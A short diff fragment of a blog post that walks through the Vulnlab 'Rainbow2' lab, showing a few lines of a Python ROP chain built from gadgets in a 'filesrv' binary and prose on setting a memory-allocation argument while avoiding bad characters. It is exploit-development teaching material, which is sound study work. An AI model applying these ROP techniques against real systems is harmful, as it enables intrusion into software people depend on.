dplastico/dplastico.github.io/_posts/2023-07-02-2023-write_up-Rainbow2-(Vulnlab).md

 rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
 rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
 ```
 Let's set up now the _flAllocationType_ argument to 0x1000.
 Nothing fancy here.
-Just the same we are doing  negating the value and then increasing it (to avoid NULL and/or badchars)
+Just the same we are doing  negating the value and then increasing it. (to avoid NULL and/or badchars)

 ```python
 rop += p32(filesrv+0x0004cbfb) #pop eax; ret;